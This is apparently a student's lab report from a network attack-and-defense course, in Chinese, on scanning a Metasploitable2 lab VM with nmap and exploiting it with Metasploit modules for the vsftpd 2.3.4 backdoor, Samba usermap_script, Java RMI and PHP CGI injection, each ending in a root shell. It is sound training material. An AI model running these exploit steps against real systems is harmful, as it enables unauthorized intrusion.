20222405 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

20222405楚喆皓發表於2024-11-17

1.實驗內容

經過高強度的攻擊滲透操作,我現在已經熟練的掌握了Metasploit工具的用法,也深刻體會到漏洞的可怕之處,這些漏洞會嚴重威脅到我們的隱私安全。

2.實驗過程

(1)前期滲透

①主機發現

輸入命令msfconsole進入控制檯

search arp_sweep搜尋一下

成功找到

輸入use 0使用auxiliary/scanner/discovery/arp_sweep

先ifconfig看一下靶機的ip地址

可以看到靶機的ip地址是192.168.50.175

這時我們set RHOSTS 192.168.50.175設定目標ip地址

然後exploit

圖中可以看出成功發現主機192.168.50.175

②埠掃描

輸入命令nmap -sT 192.168.50.175進行掃描

掃描結果如圖

③掃描系統和漏洞

輸入nmap -sV 192.168.50.175檢視服務版本資訊

輸入nmap -O 192.168.50.175檢視作業系統資訊

輸入nmap --script=vuln 192.168.50.175進行漏洞掃描

(2)Vsftpd原始碼包後門漏洞(21埠)

漏洞簡介:Vsftpd(Very Secure FTP Daemon)2.3.4版本的原始碼包被植入了惡意後門程式碼。這個漏洞的觸發點是Vsftpd在接受使用者名稱時,如果使用者名稱包含特定字串:),就會觸發後門機制。

nmap -sV -p 21 192.168.50.175掃描一下目標埠的資訊

可以看到21埠是開啟的,而且vsftpd的版本是2.3.4,即存在漏洞的版本

接下來輸入msfconsole啟動控制檯

search vsftpd搜尋相關漏洞

use 1使用exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.50.175設定目標ip地址

exploit開始攻擊

輸入uname -a、pwd、id、whoami、ifconfig等命令都可以成功執行並輸出資訊,可以證明攻擊成功

(3)SambaMS-RPC Shell命令注入漏洞(埠139)

漏洞簡介:Samba MS-RPC Shell命令注入漏洞(CVE-2007-2447)是Samba服務中的一個漏洞。攻擊者透過埠139向遠端Samba服務傳送特製請求,可利用漏洞注入命令並以root許可權執行,危害嚴重。

輸入msfconsole啟動控制檯

search samba搜尋相關漏洞

use exploit/multi/samba/usermap_script選擇要使用的漏洞

set RHOSTS 192.168.50.175設定目標ip地址

exploit開始攻擊

輸入uname -a、pwd、id、whoami、ifconfig等命令都可以成功執行並輸出資訊,可以證明攻擊成功

(4)Java RMI SERVER命令執行漏洞(1099埠)

漏洞簡介:Java RMI Server命令執行漏洞(CVE-2011-3556)允許攻擊者透過1099埠向RMI註冊服務傳送惡意序列化物件,觸發遠端程式碼執行,導致目標系統被完全控制,危害嚴重。

nmap -sV -p 1099 192.168.50.175掃描一下目標埠的資訊

接下來輸入msfconsole啟動控制檯

search rmi搜尋相關漏洞

use exploit/multi/misc/java_rmi_server選擇要使用的漏洞

set RHOSTS 192.168.50.175設定目標ip地址

exploit開始攻擊

進入了meterpreter後輸入sessions -i 1shell

這時輸入uname -a、pwd、id、whoami、ifconfig等命令都可以成功執行並輸出資訊,可以證明攻擊成功

(5)PHP CGI引數執行注入漏洞(80埠)

漏洞簡介:PHP CGI引數執行注入漏洞(CVE-2012-1823)允許攻擊者透過80埠傳送特製請求,利用未正確處理的引數在PHP CGI模式下執行任意命令,導致伺服器被控制。

nmap -sV -p 80 192.168.50.175掃描一下目標埠的資訊

接下來輸入msfconsole啟動控制檯

search php_cgi搜尋相關漏洞

use 0使用exploit/multi/http/php_cei_arg_injection

set RHOSTS 192.168.50.175設定目標ip地址

exploit開始攻擊

進入了meterpreter後輸入sessions -i 1shell

輸入uname -a、pwd、id、whoami等命令都可以成功執行並輸出資訊,可以證明攻擊成功

3.問題及解決方案

問題1:靶機Metasploitable2的網路配置不正確,導致無法正常通訊。

問題1解決方案:將靶機網路模式設定為與攻擊機一致,確保二者的ip地址在同一網段。

4.學習感悟、思考等
在這次實驗中,我更加熟練的掌握瞭如何使用Metasploit進行滲透測試,瞭解到如何透過掃描埠和發現漏洞來攻擊目標系統。具體學習了幾個常見的漏洞利用方法,如Vsftpd後門漏洞、Samba命令注入漏洞、Java RMI執行漏洞和PHP CGI注入漏洞,並透過Metasploit成功地利用這些漏洞獲取目標主機的控制許可權。透過這些實踐,我深刻感受到漏洞利用不僅需要理論知識,更要有動手實踐的能力,只有不斷操作,才能真正理解攻擊背後的原理。

相關文章